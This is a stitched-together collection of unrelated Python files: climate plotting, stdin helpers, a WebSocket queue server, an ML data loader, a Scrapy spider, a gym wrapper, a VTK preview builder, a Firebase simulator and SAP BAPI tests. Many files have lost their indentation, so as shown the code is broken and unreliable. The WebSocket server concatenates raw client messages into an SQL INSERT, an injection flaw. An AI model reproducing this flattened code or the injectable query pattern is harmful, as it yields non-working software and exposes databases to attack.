ax1 = plt.subplot(1,2,i+1)
m = Basemap(projection='ortho',lon_0=0,lat_0=89,resolution='l',
area_thresh=10000.)
var, lons_cyclic = addcyclic(var, lon)
var, lons_cyclic = shiftgrid(180., var, lons_cyclic, start=False)
lon2d, lat2d = np.meshgrid(lons_cyclic, lat)
x, y = m(lon2d, lat2d)
pvar,lons_cyclic = addcyclic(pvar, lon)
pvar,lons_cyclic = shiftgrid(180.,pvar,lons_cyclic,start=False)
climoq,lons_cyclic = addcyclic(climo[i], lon)
climoq,lons_cyclic = shiftgrid(180.,climoq,lons_cyclic,start=False)
m.drawmapboundary(fill_color='white',color='dimgray',linewidth=0.7)
cs = m.contourf(x,y,var,limit,extend='both')
cs1 = m.contourf(x,y,pvar,colors='None',hatches=['....'],
linewidths=0.4)
if varnames[v] == 'Z30': # the interval is 250 m
cs2 = m.contour(x,y,climoq,np.arange(21900,23500,250),
colors='k',linewidths=1.5,zorder=10)
m.drawcoastlines(color='dimgray',linewidth=0.8)
if varnames[v] == 'T2M':
cmap = ncm.cmap('NCV_blu_red')
cs.set_cmap(cmap)
elif varnames[v] == 'Z500':
cmap = ncm.cmap('nrl_sirkes')
cs.set_cmap(cmap)
elif varnames[v] == 'Z30':
cmap = ncm.cmap('nrl_sirkes')
cs.set_cmap(cmap)
elif varnames[v] == 'SLP':
cmap = ncm.cmap('nrl_sirkes')
cs.set_cmap(cmap)
elif varnames[v] == 'U10' or varnames[v] == 'U300':
cmap = ncm.cmap('temp_diff_18lev')
cs.set_cmap(cmap)
elif varnames[v] == 'SWE':
            cmap = cmocean.cm.balance
cs.set_cmap(cmap)
elif varnames[v] == 'P':
cmap = ncm.cmap('precip4_diff_19lev')
cs.set_cmap(cmap)
elif varnames[v] == 'THICK':
cmap = ncm.cmap('NCV_blu_red')
cs.set_cmap(cmap)
elif varnames[v] == 'EGR':
cmap = cmocean.cm.curl
cs.set_cmap(cmap)
### Add experiment text to subplot
ax1.annotate(r'%s' % experiments[i],xy=(0,0),xytext=(0.5,1.05),
textcoords='axes fraction',color='dimgrey',
fontsize=23,rotation=0,ha='center',va='center')
###########################################################################
cbar_ax = fig.add_axes([0.312,0.15,0.4,0.03])
cbar = fig.colorbar(cs,cax=cbar_ax,orientation='horizontal',
extend='max',extendfrac=0.07,drawedges=False)
if varnames[v] == 'T2M':
cbar.set_label(r'\textbf{$^\circ$C}',fontsize=11,color='dimgray')
elif varnames[v] == 'Z500':
cbar.set_label(r'\textbf{m}',fontsize=11,color='dimgray')
elif varnames[v] == 'Z30':
cbar.set_label(r'\textbf{m}',fontsize=11,color='dimgray')
elif varnames[v] == 'SLP':
cbar.set_label(r'\textbf{hPa}',fontsize=11,color='dimgray')
elif varnames[v] == 'U10' or varnames[v] == 'U300':
cbar.set_label(r'\textbf{m/s}',fontsize=11,color='dimgray')
elif varnames[v] == 'SWE':
cbar.set_label(r'\textbf{mm}',fontsize=11,color='dimgray')
elif varnames[v] == 'P':
cbar.set_label(r'\textbf{mm/day}',fontsize=11,color='dimgray')
elif varnames[v] == 'THICK':
cbar.set_label(r'\textbf{m}',fontsize=11,color='dimgray')
elif varnames[v] == 'EGR':
cbar.set_label(r'\textbf{1/day}',fontsize=11,color='dimgray')
cbar.set_ticks(barlim)
cbar.set_ticklabels(list(map(str,barlim)))
cbar.ax.tick_params(axis='x', size=.01)
cbar.outline.set_edgecolor('dimgrey')
plt.subplots_adjust(wspace=0.01)
plt.subplots_adjust(hspace=0.01)
plt.subplots_adjust(bottom=0.15)
plt.savefig(directoryfigure + '/QBO_%s/QBOExperiments_E-W_%s_%s.png' % (period,
period,
varnames[v]),
dpi=300)
print('Completed: Script done!')
|
# ___declarations in `utilities.py`___
# update `utilities.py` as well if you make any change
#_________________________________________________________________________
import fileinput
from contextlib import contextmanager
@contextmanager
def line_bind(line, *ctors, splitter=lambda l: l.split(' '), do=None):
'''
Split `line` argument producing an iterable of mapped elements, in the sense of `ctors`.
    Keyword argument `splitter` splits the given `line` on the space (' ')
    character by default; however, the desired behavior can be customized by
    providing a lambda expression of one parameter, which is eventually applied to `line`.
    The iterable produced by `splitter` should match argument `ctors` in length;
    if this holds, an iterable of mapped elements is produced, composed of elements
    built by applying each function in `ctors` to each element of the split, pairwise.
    On the other hand, mapping happens according to the rules of `zip` if lengths differ.
    Keyword argument `do` is a higher-order operator and defaults to `None`: if
    given, it should be a function that receives the generator; otherwise the generator is returned.
    Moreover, the returned iterable object is a generator, so a linear scan of the line
    *is not* performed eagerly; hence there is no need to supply a higher-order operator to
    be applied during the scan, and this provides good performance at the same time.
'''
g = (c(v) for c, v in zip(ctors, splitter(line)))
yield do(g) if do else g
@contextmanager
def stdin_input(getter=lambda: fileinput.input(), raw_iter=False):
'''
Produces a way to fetch lines by a source.
Keyword argument `getter` should be a thunk that produces an iterable, call it `i`;
by default, it produces the iterator which reads from standard input.
Keyword argument `raw_iter` is a boolean. If it is `True`, that iterator `i` is
returned as it is; otherwise, a thunk is returned which wraps the application `next(i)`.
'''
iterable = getter()
yield iterable if raw_iter else (lambda: next(iterable))
def forever_read_until_event(doer, reader=lambda: stdin_input(), event=StopIteration):
'''
Runs forever a `doer` function reading a source, until an event happens.
An iterable, provided by the `reader` thunk, is read infinitely until `event`
is raised. By defaults, `reader` reads from standard input and `event` is `StopIteration`.
'''
with reader() as f:
while True:
try: doer(f)
except event: break
#________________________________________________________________________
def python_code(*objs, markdown=True, remove_comments=False, docstring_delimiter=r'"""'):
import inspect
def cleaner(obj):
src = inspect.getsource(obj)
if remove_comments and inspect.getdoc(obj):
            # the following could be done more clearly using regex, but for now...
start = src.index(docstring_delimiter, 0)
end = src.index(docstring_delimiter, start+len(docstring_delimiter))
removing_src = list(src)
del removing_src[start:end+len(docstring_delimiter)]
src = "".join(removing_src)
return src
src = "\n".join(map(cleaner, objs))
if markdown:
from IPython.display import Markdown
src = Markdown('```python\n{0}\n```'.format(src))
return src
#________________________________________________________________________
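# A minimal usage sketch (not part of the original declarations): parse one
# whitespace-separated line into typed values with `line_bind`, and read lines
# lazily via `stdin_input` using a custom getter so no real stdin is needed.
if __name__ == '__main__':
    with line_bind('3 4.5 spam', int, float, str) as values:
        n, x, word = values
        print(n, x, word)            # -> 3 4.5 spam
    with stdin_input(getter=lambda: iter(['first line', 'second line'])) as next_line:
        print(next_line())           # -> first line
        print(next_line())           # -> second line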
|
#!/usr/bin/env python
import sys
import sqlite3
import threading
import json
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
if (sys.version_info > (3, 0)):
import configparser
config = configparser.ConfigParser()
config.read('config.txt')
else:
import ConfigParser
config = ConfigParser.ConfigParser()
config.read(r'config.txt')
delay = config.get("config", "delay")
socketserver = config.get("config", "server")
socketport = config.get("config", "port")
clients = []
class teraWebSocket(WebSocket):
def handleMessage(self):
sockdata = json.loads(self.data)
conn = sqlite3.connect('antrean.db')
cur = conn.cursor()
if "reset" in sockdata:
            cur.execute("UPDATE SQLITE_SEQUENCE SET SEQ= 0 WHERE NAME='antrean'")  # reset the autoincrement sequence
            conn.commit()
            cur.execute("delete from antrean")  # delete all queue data
conn.commit()
else:
            # accept queue (antrean) data
cur.execute("INSERT INTO antrean(data) VALUES('" + self.data + "')")
conn.commit()
conn.close()
def handleConnected(self):
clients.append(self)
def handleClose(self):
clients.remove(self)
# broadcast message every n seconds defined in config (delay)
def loops():
conn = sqlite3.connect('antrean.db')
conn.row_factory = sqlite3.Row
cur = conn.cursor()
cur.execute("select count(*) from antrean")
cnt = cur.fetchone()[0]
if int(cnt) > 0:
cur.execute("select id, data from antrean order by id asc limit 1")
data = cur.fetchone()
#broadcast
for client in clients:
client.sendMessage(data['data'])
#delete current data
cur.execute("delete from antrean where id=" + str(data['id']))
conn.commit()
conn.close()
threading.Timer(int(delay), loops).start()
loops()
server = SimpleWebSocketServer(socketserver, socketport, teraWebSocket)
server.serveforever()
|
from typing import List
from entities.word_evaluation import WordEvaluation
class WordNeighbourhoodStats:
def __init__(
self,
target_word: str,
neighbourhoods: List[List[WordEvaluation]]):
self._target_word = target_word
self._neighbourhoods = neighbourhoods
self._overlapping_words = self._calculate_overlaps()
    def _calculate_overlaps(self) -> int:
        if self.neighbourhoods_amount < 2:
            return 0
overlaps = set(self._neighbourhoods[0])
for neighbourhood in self._neighbourhoods[1:]:
overlaps = overlaps & set(neighbourhood)
result = len(overlaps)
return result
def add_neighbourhood(self, neighbourhood: List[WordEvaluation]):
self._neighbourhoods.append(neighbourhood)
self._overlapping_words = self._calculate_overlaps()
def get_all_embeddings(self) -> List[List[float]]:
result = []
for i, neighbourhood in enumerate(self._neighbourhoods):
for word_evaluation in neighbourhood:
result.append(word_evaluation.get_embeddings(i))
return result
def get_all_words(self) -> List[str]:
result = []
for neighbourhood in self._neighbourhoods:
for word_evaluation in neighbourhood:
result.append(word_evaluation.word)
return result
@property
def target_word(self) -> str:
return self._target_word
@property
def overlaps_amount(self) -> int:
return self._overlapping_words
@property
def neighbourhoods_amount(self) -> int:
return len(self._neighbourhoods)
@property
def neighbourhood_size(self) -> int:
return len(self._neighbourhoods[0])
|
from misc import util
from collections import namedtuple
import numpy as np
import os
from PIL import Image
import sys
import json
import scipy
import gflags
FLAGS = gflags.FLAGS
USE_IMAGES = False
#N_EX = 6
N_EX = 4
sw_path = os.path.join(sys.path[0], "data/shapeworld")
Fold = namedtuple("Fold", ["hints", "examples", "inputs", "labels"])
Datum = namedtuple("Datum", ["hint", "ex_inputs", "input", "label"])
VisDatum = namedtuple("VisDatum", ["hint", "ex_inputs", "input", "label", "vis_ex_inputs", "vis_input"])
START = "<s>"
STOP = "</s>"
random = util.next_random()
class ShapeworldTask():
def __init__(self):
self.hint_vocab = util.Index()
self.feature_index = util.Index()
self.START = START
self.STOP = STOP
#with open(os.path.join(sw_path, "train", "examples.struct.json")) as feature_f:
# feature_data = json.load(feature_f)
# for datum in feature_data:
# for example in datum:
# for feature in example:
# self.feature_index.index(tuple(feature))
data = {}
for fold in ("train", "val", "test", "val_same", "test_same"):
examples = np.load(os.path.join(sw_path, fold, "examples.npy"))
inputs = np.load(os.path.join(sw_path, fold, "inputs.npy"))
labels = np.load(os.path.join(sw_path, fold, "labels.npy"))
with open(os.path.join(sw_path, fold, "hints.json")) as hint_f:
hints = json.load(hint_f)
#new_hints = []
#for hint in hints:
# hint = hint.split()
# new_hint = []
# for i in range(len(hint) - 1):
# new_hint.append(hint[i] + "/" + hint[i+1])
# new_hints.append(" ".join(new_hint))
#hints = new_hints
indexed_hints = []
for hint in hints:
hint = [START] + hint.split() + [STOP]
indexed_hint = [self.hint_vocab.index(w) for w in hint]
indexed_hints.append(indexed_hint)
hints = indexed_hints
#ex_features = np.zeros((examples.shape[0], examples.shape[1], len(self.feature_index)))
#inp_features = np.zeros((examples.shape[0], len(self.feature_index)))
#with open(os.path.join(sw_path, fold, "examples.struct.json")) as ex_struct_f:
# examples_struct = json.load(ex_struct_f)
# for i_datum, expls in enumerate(examples_struct):
# for i_ex, example in enumerate(expls):
# for feature in example:
# i_feat = self.feature_index[tuple(feature)]
# if i_feat:
# ex_features[i_datum, i_ex, i_feat] = 1
#with open(os.path.join(sw_path, fold, "inputs.struct.json")) as in_struct_f:
# inputs_struct = json.load(in_struct_f)
# for i_datum, example in enumerate(inputs_struct):
# for feature in example:
# i_feat = self.feature_index[tuple(feature)]
# if i_feat is not None:
# inp_features[i_datum, i_feat] = 1
ex_features = np.load(os.path.join(sw_path, fold, "examples.feats.npy"))
inp_features = np.load(os.path.join(sw_path, fold, "inputs.feats.npy"))
fold_data = []
for i in range(len(hints)):
if USE_IMAGES:
fold_data.append(Datum(
hints[i], examples[i, ...], inputs[i, ...], labels[i]))
else:
fold_data.append(Datum(
hints[i], ex_features[i, ...], inp_features[i, ...], labels[i]))
if FLAGS.vis:
# TODO this is so dirty!
datum = fold_data[-1]
fold_data[-1] = VisDatum(
datum.hint, datum.ex_inputs, datum.input,
datum.label, examples[i, ...], inputs[i, ...])
data[fold] = fold_data
self.train_data = data["train"]
self.val_data = data["val"]
self.test_data = data["test"]
self.val_same_data = data["val_same"]
self.test_same_data = data["test_same"]
#self.train_data = data["train"][:8000]
#self.val_data = data["train"][8000:8500]
#self.test_data = data["train"][8500:9000]
if USE_IMAGES:
self.width, self.height, self.channels = self.train_data[0].input.shape
else:
#self.n_features = len(self.feature_index)
self.n_features = inp_features.shape[1]
def sample_train(self, n_batch, augment):
n_train = len(self.train_data)
batch = []
#for _ in range(n_batch):
# datum = self.train_data[random.randint(n_train)]
# batch.append(datum)
for _ in range(n_batch):
datum = self.train_data[random.randint(n_train)]
if not augment:
batch.append(datum)
continue
label = random.randint(2)
if label == 0:
alt_datum = self.train_data[random.randint(n_train)]
swap = random.randint(N_EX + 1)
if swap == N_EX:
feats = alt_datum.input
else:
feats = alt_datum.ex_inputs[swap, ...]
datum = datum._replace(input=feats, label=0)
elif label == 1:
swap = random.randint((N_EX + 1 if datum.label == 1 else N_EX))
if swap != N_EX:
examples = datum.ex_inputs.copy()
feats = examples[swap, ...]
if datum.label == 1:
examples[swap, ...] = datum.input
else:
examples[swap, ...] = examples[random.randint(N_EX), ...]
datum = datum._replace(input=feats, ex_inputs=examples, label=1)
batch.append(datum)
#if datum.label == 0:
# batch.append(datum)
# continue
#swap = random.randint(N_EX + 1)
#if swap == N_EX:
# batch.append(datum)
# continue
#examples = datum.ex_inputs.copy()
#tmp = examples[swap, ...]
#examples[swap, ...] = datum.input
#datum = datum._replace(ex_inputs=examples, input=tmp)
#batch.append(datum)
#for _ in range(n_batch):
# datum = self.train_data[random.randint(n_train)]
# in_examples = datum.ex_inputs
# out_examples = []
# #for i_ex in range(N_EX):
# # out_examples.append(
# # in_examples[random.randint(in_examples.shape[0]), ...])
# indices = list(range(in_examples.shape[0]))
# random.shuffle(indices)
# indices = indices[:N_EX]
# out_examples = [in_examples[i, ...] for i in indices]
# #out_examples = in_examples[:N_EX, ...]
# datum = datum._replace(ex_inputs=np.asarray(out_examples))
# batch.append(datum)
return batch
def sample_val(self, same=False):
if same:
return self.val_same_data
else:
return self.val_data
def sample_test(self, same=False):
if same:
return self.test_same_data
else:
return self.test_data
def visualize(self, datum, hyp, pred, dest):
hint = " ".join(self.hint_vocab.get(w) for w in datum.hint[1:-1])
hyp = " ".join(self.hint_vocab.get(w) for w in hyp[1:-1])
os.mkdir(dest)
with open(os.path.join(dest, "desc.txt"), "w") as desc_f:
print >>desc_f, "gold desc:", hint
print >>desc_f, "pred desc:", hyp
print >>desc_f, "gold label:", bool(datum.label)
print >>desc_f, "pred label:", bool(pred)
for i in range(datum.ex_inputs.shape[0]):
scipy.misc.imsave(
os.path.join(dest, "ex_%d.png" % i),
datum.vis_ex_inputs[i, ...])
scipy.misc.imsave(
os.path.join(dest, "input.png"),
datum.vis_input)
|
"""
created by ldolin
"""
import sys
import scrapy
from scrapy_demo.tutorial.tutorial.items import MaoyanreyingItem
# sys.path.append('..')
# from items import MaoyanreyingItem
class MaoyanSpider(scrapy.Spider):
name = 'maoyan'
allowed_domains = ['maoyan.com']
start_urls = ['http://maoyan.com/board/7/']
def parse(self, response):
d1 = response.css('.board-wrapper dd')
for dd in d1:
item = MaoyanreyingItem()
            item['index'] = dd.css('.board-index::text').extract_first()
            item['name'] = dd.css('.name::text').extract_first()
            item['star'] = dd.css('.star::text').extract_first()
            item['releasetime'] = dd.css('.releasetime::text').extract_first()
            # score = integer part + fraction part; the item keys above assume
            # matching fields declared in MaoyanreyingItem
            item['score'] = dd.css('.integer::text').extract_first() + dd.css('.fraction::text').extract_first()
yield item
|
import cv2
import gym
import numpy as np
class MixedGrayscaleColorFrameStack(gym.ObservationWrapper):
"""Stacks the latest frame as color and previous frames as grayscale."""
def __init__(self, env, num_prev_frames=1):
super().__init__(env)
self.num_prev_frames = num_prev_frames
w, h, c = env.observation_space.shape
# This stores the frames in grayscale (we only need to store frames in grayscale not color).
self.grayscale_frames = np.zeros((w, h, self.num_prev_frames), dtype=np.uint8)
# Number of channels is (channels for latest in color) + (number of previous frames).
observation_shape = (w, h, c + num_prev_frames)
low = np.zeros(observation_shape, dtype=np.uint8)
high = np.ones(observation_shape, dtype=np.uint8) * 255
self.observation_space = gym.spaces.Box(low=low, high=high, dtype=np.uint8)
def _insert_observation(self, observation):
self.grayscale_frames = np.roll(self.grayscale_frames, shift=-1, axis=-1)
self.grayscale_frames[:, :, -1] = cv2.cvtColor(observation, cv2.COLOR_RGB2GRAY)
    def _format_observation(self, observation):
        return np.concatenate((self.grayscale_frames, observation), axis=-1)
    def observation(self, observation):
        observation_to_return = self._format_observation(observation)
self._insert_observation(observation)
return observation_to_return
def reset(self):
self.grayscale_frames.fill(0)
return super().reset()
def plot(self, obs, filepath):
import matplotlib.pyplot as plt
fig, axs = plt.subplots(1, self.num_prev_frames + 1, figsize=(12, 6))
axs[0].imshow(obs[:, :, -3:])
for i in range(1, self.num_prev_frames + 1):
axs[i].imshow(obs[:, :, i - 1])
plt.savefig(filepath)
plt.close()
if __name__ == "__main__":
import sys
env = gym.make("procgen:procgen-plunder-v0")
env = MixedGrayscaleColorFrameStack(env, num_prev_frames=2)
x = env.reset()
env.plot(x, f"/home/wulfebw/Desktop/scratch/test_0.png")
for i in range(1, 500):
sys.stdout.write(f"\r{i}")
x, _, done, _ = env.step(env.action_space.sample())
env.plot(x, f"/home/wulfebw/Desktop/scratch/test_{i}.png")
|
# -*- coding: utf-8 -*-
import tempfile
import typing
from preview_generator.exception import BuilderDependencyNotFound
from preview_generator.exception import UnsupportedMimeType
from preview_generator.extension import mimetypes_storage
from preview_generator.preview.builder.image_pillow import ImagePreviewBuilderPillow  # nopep8
from preview_generator.preview.generic_preview import PreviewBuilder
from preview_generator.utils import ImgDims
from preview_generator.utils import MimetypeMapping
# HACK - G.M - 2019-11-05 - Hack to allow load of module without vtk installed
vtk_installed = True
try:
from vtk import vtkActor
from vtk import vtkNamedColors
from vtk import vtkPNGWriter
from vtk import vtkPolyDataMapper
from vtk import vtkRenderWindow
from vtk import vtkRenderer
from vtk import vtkSTLReader
from vtk import vtkVersion
from vtk import vtkWindowToImageFilter
from vtk.vtkIOKitPython import vtkAbstractPolyDataReader
from vtk.vtkIOKitPython import vtkOBJReader
from vtk.vtkIOKitPython import vtkPLYReader
except ImportError:
vtk_installed = False
class ImagePreviewBuilderVtk(PreviewBuilder):
PLY_MIMETYPES_MAPPING = [MimetypeMapping("application/ply", ".ply")]
OBJ_MIMETYPES_MAPPING = [
MimetypeMapping("application/wobj", ".obj"),
MimetypeMapping("application/object", ".obj"),
MimetypeMapping("model/obj", ".obj"),
]
STL_MIMETYPES_MAPPING = [
MimetypeMapping("application/sla", ".stl"),
MimetypeMapping("application/vnd.ms-pki.stl", ".stl"),
MimetypeMapping("application/x-navistyle", ".stl"),
MimetypeMapping("model/stl", ".stl"),
]
@classmethod
def get_label(cls) -> str:
return "Images generator from 3d file - based on Vtk"
@classmethod
def get_supported_mimetypes(cls) -> typing.List[str]:
mimetypes = []
for mimetype_mapping in cls.get_mimetypes_mapping():
mimetypes.append(mimetype_mapping.mimetype)
return mimetypes
@classmethod
def get_mimetypes_mapping(cls) -> typing.List[MimetypeMapping]:
return cls.STL_MIMETYPES_MAPPING + cls.OBJ_MIMETYPES_MAPPING + cls.PLY_MIMETYPES_MAPPING
@classmethod
def check_dependencies(cls) -> None:
if not vtk_installed:
raise BuilderDependencyNotFound("this builder requires vtk to be available")
@classmethod
def dependencies_versions(cls) -> typing.Optional[str]:
vtk_version = vtkVersion()
return "VTK version :{}".format(vtk_version.GetVTKVersion())
@classmethod
def _get_vtk_reader(cls, mimetype: str) -> "vtkAbstractPolyDataReader":
if mimetype in [mapping.mimetype for mapping in cls.STL_MIMETYPES_MAPPING]:
return vtkSTLReader()
elif mimetype in [mapping.mimetype for mapping in cls.OBJ_MIMETYPES_MAPPING]:
return vtkOBJReader()
elif mimetype in [mapping.mimetype for mapping in cls.PLY_MIMETYPES_MAPPING]:
return vtkPLYReader()
else:
raise UnsupportedMimeType("Unsupported mimetype: {}".format(mimetype))
def build_jpeg_preview(
self,
file_path: str,
preview_name: str,
cache_path: str,
page_id: int,
extension: str = ".jpg",
size: ImgDims = None,
mimetype: str = "",
) -> None:
if not size:
size = self.default_size
colors = vtkNamedColors()
if not mimetype:
guessed_mimetype, _ = mimetypes_storage.guess_type(file_path, strict=False)
# INFO - G.M - 2019-11-22 - guessed_mimetype can be None
mimetype = guessed_mimetype or ""
reader = self._get_vtk_reader(mimetype)
reader.SetFileName(file_path)
mapper = vtkPolyDataMapper()
mapper.SetInputConnection(reader.GetOutputPort())
actor = vtkActor()
actor.SetMapper(mapper)
rotation = (-70, 0, 45)
R_x, R_y, R_z = rotation # TODO set a good looking default orientation
actor.RotateX(R_x)
actor.RotateY(R_y)
actor.RotateZ(R_z)
# Create a rendering window and renderer
ren = vtkRenderer()
renWin = vtkRenderWindow()
renWin.OffScreenRenderingOn()
renWin.AddRenderer(ren)
renWin.SetSize(size.width, size.height)
ren.SetBackground(colors.GetColor3d("white"))
# Assign actor to the renderer
ren.AddActor(actor)
renWin.Render()
# Write image
windowto_image_filter = vtkWindowToImageFilter()
windowto_image_filter.SetInput(renWin)
# windowto_image_filter.SetScale(scale) # image scale
windowto_image_filter.SetInputBufferTypeToRGBA()
with tempfile.NamedTemporaryFile(
"w+b", prefix="preview-generator-", suffix=".png"
) as tmp_png:
writer = vtkPNGWriter()
writer.SetFileName(tmp_png.name)
writer.SetInputConnection(windowto_image_filter.GetOutputPort())
writer.Write()
return ImagePreviewBuilderPillow().build_jpeg_preview(
tmp_png.name, preview_name, cache_path, page_id, extension, size, mimetype
)
def has_jpeg_preview(self) -> bool:
return True
def get_page_number(
self, file_path: str, preview_name: str, cache_path: str, mimetype: str = ""
) -> int:
return 1
|
"""
Dubins Rejoin Agent Plant
dubinplant.py
Taken from
> Umberto Ravaioli, James Cunningham, John McCarroll, Vardaan Gangal, Kerianne Hobbs,
> "Safe Reinforcement Learning Benchmark Environments for Aerospace Control Systems,"
> IEEE Aerospace, Big Sky, MT, March 2022.
"""
import numpy as np
def model_output(model, time_t, state_air, input_forces):
return []
def model_state_update(model, time_t, state_air, input_rate):
    # Dubins kinematics; state_air is assumed to be [x, y, heading], with
    # model.v the (constant) speed and the selected input the turn rate.
    input_rate = input_rate[model.idx]
    xdot = np.zeros((3,))
    xdot[0] = model.v * np.cos(state_air[-1])  # x_dot = v * cos(heading)
    xdot[1] = model.v * np.sin(state_air[-1])  # y_dot = v * sin(heading)
    xdot[2] = input_rate                       # heading_dot = turn-rate input
    return xdot
|
#!/usr/bin/env python
from __future__ import print_function
import sys
if __name__ == '__main__':
if len(sys.argv) == 1:
print("Usage: {} <bitboard>".format(sys.argv[0]))
sys.exit(0)
bbrd = int(sys.argv[1])
print(bbrd)
sys.stdout.write('+---+---+---+---+---+---+---+---+\n')
for rank in reversed(range(0, 8)):
for file in range(8):
sq = rank * 8 + file
pc = '*' if (bbrd & (1 << sq)) else ' '
sys.stdout.write('| {} '.format(pc))
sys.stdout.write('|\n+---+---+---+---+---+---+---+---+\n')
|
import firebase_admin
from firebase_admin import db
from firebase_admin import credentials
import json
import math
import random
from time import sleep as s
from time import time as t
cred = credentials.Certificate("serviceAccount.json")
fb = firebase_admin.initialize_app(cred, options={
"databaseURL": "https://sustaingineering-horus.firebaseio.com"
})
i = 0
sensors = ["123456", "69420", "1"]
while True:
time = t()
shape = {
"power": random.randrange(200, 600),
"surface-temperature": random.randrange(10, 30),
"op-temp": random.randrange(10, 30),
"current": math.sin(i),
"water-breaker": random.randrange(0, 3),
"time-stamp": int(time),
"voltage": math.cos(i)
}
i += 0.1
for sensor in sensors:
# Update or set is the same here, since we're accessing a child that's unique already
db.reference(path=sensor).child(str(int(time))).set(shape)
s(2)
|
from homeassistant.const import TEMP_CELSIUS
def field_mask(str_value, from_start=0, from_end=0):
    """Mask a string with 'x', keeping the first from_start and last from_end characters visible."""
    str_mask = "x" * (len(str_value) - from_start - from_end)
    # str_value[-0:] would return the whole string, so handle from_end=0 explicitly.
    suffix = str_value[-from_end:] if from_end else ""
    return f"{str_value[:from_start]}{str_mask}{suffix}"
def convert_temp_value(temp_unit, service_code, target_value):
"""Convert from C/F to 31-57 needed for service call"""
# Handle setting car units (prior to version 2.0)
if target_value >= 31 and target_value <= 57:
return target_value
# Engine start/set rcc value
if service_code == "REON":
# Get temp units
if temp_unit == TEMP_CELSIUS:
# Convert from C
return min(57, max(31, int(target_value * 2)))
else:
# Convert from F
return min(57, max(31, target_value - 27))
# Climate preconditioning
if service_code == "ECC":
if temp_unit == TEMP_CELSIUS:
return min(285, max(155, int(target_value * 10)))
else:
# Convert from F
return min(285, max(155, int(((target_value - 27) / 2) * 10)))
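# Illustrative conversions (not from the original source), following the clamping above:
#   convert_temp_value(TEMP_CELSIUS, "REON", 21)   -> 42   (21 * 2, clamped to 31..57)
#   convert_temp_value("°F", "REON", 70)           -> 43   (70 - 27, clamped to 31..57)
#   convert_temp_value(TEMP_CELSIUS, "ECC", 20.5)  -> 205  (20.5 * 10, clamped to 155..285)
#   convert_temp_value(TEMP_CELSIUS, "REON", 45)   -> 45   (already in the 31..57 car-unit range)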
|
import json
with open("pop_fandoms.json", "r") as f:
temp_list = json.load(f)
mem = []
final = []
for record in temp_list:
url = record["fandom_link"]
if url not in mem:
mem.append(url)
final.append({"fandom": record["fandom"], "fandom_link": record["fandom_link"]})
with open("pop_fandoms_clean.json", "w") as f:
json.dump(final, f, indent = 6)
|
# Usage::
#
# {{thumbnail:.files/img/favicon.png 200x100 exact_size}}
#
# where width = 200 & height = 100
#
# By default, the macro preserves the aspect ratio of the image. If you set 'exact_size', then the generated thumbnail
# will be of the same passed size exactly. 'exact_size' is optional
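#
# Example preserving the aspect ratio (thumbnail fits within 200x100):
#
#   {{thumbnail:.files/img/favicon.png 200x100}}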
import os
DEFAULT_THUMB_SIZE = '150x100'
def main(j, args, params, tags, tasklet):
page = args.page
try:
import Image
except ImportError:
# pyflakes.ignore
from PIL import Image
space_name = args.doc.getSpaceName()
space_path = j.portal.tools.server.active.getSpace(space_name).model.path
macro_params = args.cmdstr.split(' ')
img_url = macro_params[0]
if len(macro_params) >= 2:
thumb_size = macro_params[1]
else:
thumb_size = args.doc.docparams.get('thumb_size', DEFAULT_THUMB_SIZE)
if len(macro_params) >= 3:
exact_size = macro_params[2]
else:
exact_size = False
thumb_size = thumb_size or args.doc.docparams.get('thumb_size', DEFAULT_THUMB_SIZE)
width, height = [int(x) for x in thumb_size.split('x')]
img_path = img_url.strip('/')
full_img_path = os.path.join(space_path, img_path)
# Add 's_' to file name to tell that this is a thumbnail, and add width & height too
thumbnail_path = ('{0}s_{1}x{2}_').format(os.path.sep, width, height).join(os.path.split(full_img_path))
img_url_base, img_name = os.path.split(img_url)
thumbnail_url = os.path.join(space_name, img_url_base.strip('/'), r's_{0}x{1}_{2}'.format(width, height, img_name))
# If the thumbnail doesn't exist on the desk, generate it
if not os.path.exists(thumbnail_path):
im = Image.open(full_img_path)
if exact_size:
im = im.resize((width, height), Image.ANTIALIAS)
else:
im.thumbnail((width, height), Image.ANTIALIAS)
im.save(thumbnail_path)
page.addMessage('<img src="/{0}" />'.format(thumbnail_url))
params.result = page
return params
def match(j, args, params, tags, tasklet):
return True
|
tags = list()
ticks = list()
urls = list()
#Contain specific info for each video
#CREATOR, VIEWS, TAGS, DATE PUBLISHED
video_info = list()
YOUTUBE = "https://www.youtube.com"
STARTING = "https://www.youtube.com/watch?v=fzQ6gRAEoy0"
|
from private.http import Http
from private.cookie import Cookie
class Profile:
def __init__(self):
self.Cookie = Cookie()
self.Http = Http()
def IsAuthorized(self):
if not self.Cookie.GetCookie("Auth"):
print("not logged in")
self.Http.Redirect(303, '/signin')
return False
else:
return True
|
import argparse
import torch
from bitpack.pytorch_interface import load_quantized_state_dict
parser = argparse.ArgumentParser(description='To unpack models that are packed by BitPack')
parser.add_argument('--device',
type=int,
default=-1,
help='index of target device, -1 means cpu')
parser.add_argument('--input-packed-file',
type=str,
default=None,
help='path to packed file')
parser.add_argument('--original-int-file',
type=str,
default=None,
help='original quantized file in integer format, this is for correctness check')
args = parser.parse_args()
if args.device == -1:
target_device = torch.device('cpu')
else:
target_device = torch.device('cuda:' + str(args.device))
unpacked_state_dict = load_quantized_state_dict(args.input_packed_file, target_device)
if args.original_int_file:
original_state_dict = torch.load(args.original_int_file)['weight_integer']
for k in original_state_dict.keys():
if not torch.all(unpacked_state_dict[k].type_as(original_state_dict[k])==original_state_dict[k]):
print("Error Detected between Unpacked Tensor and Original Tensor with Key Value: ", k)
print("Unpacked Tensor: ", unpacked_state_dict[k])
print("Original Tensor: ", original_state_dict[k])
break
else:
print("Correctly Match: ", k)
|
#!/usr/bin/env python3
import unittest
from unittest.mock import Mock
from sap.rfc.bapi import (
bapi_message_to_str,
BAPIReturn,
BAPIError
)
def create_bapiret(typ:str=None, message:str=None, msg_class:str=None, msg_number:str=None):
return {'TYPE': typ, 'ID': msg_class, 'NUMBER': msg_number, 'MESSAGE': message}
def create_bapiret_error(message:str):
return create_bapiret(typ='E', message=message, msg_class='ERR', msg_number='333')
def create_bapiret_warning(message:str):
return create_bapiret(typ='W', message=message, msg_class='WRN', msg_number='777')
def create_bapiret_info(message:str):
return create_bapiret(typ='S', message=message, msg_class='NFO', msg_number='555')
class TestMessageToStr(unittest.TestCase):
def getBAPIMessage(self, **kwargs):
bapiret = {
'ID': '',
'TYPE': '',
'NUMBER': '',
'MESSAGE': 'message',
}
bapiret.update(kwargs)
return bapi_message_to_str(bapiret)
def test_short_error(self):
self.assertEqual('Error: message', self.getBAPIMessage(TYPE='E'))
